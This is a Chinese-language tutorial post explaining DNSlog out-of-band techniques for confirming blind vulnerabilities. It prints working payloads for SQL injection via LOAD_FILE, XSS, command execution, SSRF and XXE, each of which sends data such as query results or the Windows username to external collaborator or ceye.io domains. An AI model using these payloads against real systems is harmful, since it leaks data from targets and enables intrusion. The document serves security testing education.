DNSlog

DNSlog什么是DNSlogDNSlog就是存储在DNSServer上的域名信息,它记录着用户对域名的访问信息,类似日志文件。原理payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。使用方法通过BurpSuite通过在线平台http://www.dnslog.cn/http://ceye.io/利用场景执行命令时没

大家好,欢迎来到IT知识分享网。

什么是DNSlog

DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。

原理

payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。

使用方法

通过Burp Suite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

通过在线平台

http://www.dnslog.cn/
在这里插入图片描述
http://ceye.io/

利用场景

执行命令时没有回显的;sql、xss、ssrf、xxe、命令执行

sql注入

布尔盲注、时间盲注,需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban,所以在MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不仅能够加载本地文件,同时也能对URL发起请求。

SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx'));

xss

浏览器访问预设至的链接地址,如果DNSLog平台收到的DNS查询,即可证明存在XSS

<img src=http://xss.xxxx.ceye.io>

http://xss/level1.php?name=%3Cimg%20src=http://389spnjjms0is0cyzxu5cfa5gwmpae.burpcollaborator.net%3E

在这里插入图片描述

命令执行

有的命令执行的漏洞并没有回显,我们不能确定漏洞是否存在,也不知道我们输入的命令是否被执行,这种情况我们可以利用DNSLOG来获取命令的执行结果。

ping 系统变量名.地址
ping %USERNAME%.dn424xyt12fs7ar8e79frppfv611pq.burpcollaborator.net

Windows变量名
在这里插入图片描述

在这里插入图片描述

SSRF

直接将ssrf中地址换成我们的dnslog平台

?url=er938y2u53jtbbv9i8dgvqtgz757tw.burpcollaborator.net/flag.php

在这里插入图片描述

XXE

使用参数实体,引用外部实体文件(目的地址是我们DNS服务器),二级或三级域名写成我们想要的信息,不加其他信息测试存在XXE。

<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://%USERNAME%.pnge49y51ef47mrkej9rr1prvi1hp6.burpcollaborator.net/">%remote;]>

在这里插入图片描述

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/20777.html

(0)

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

关注微信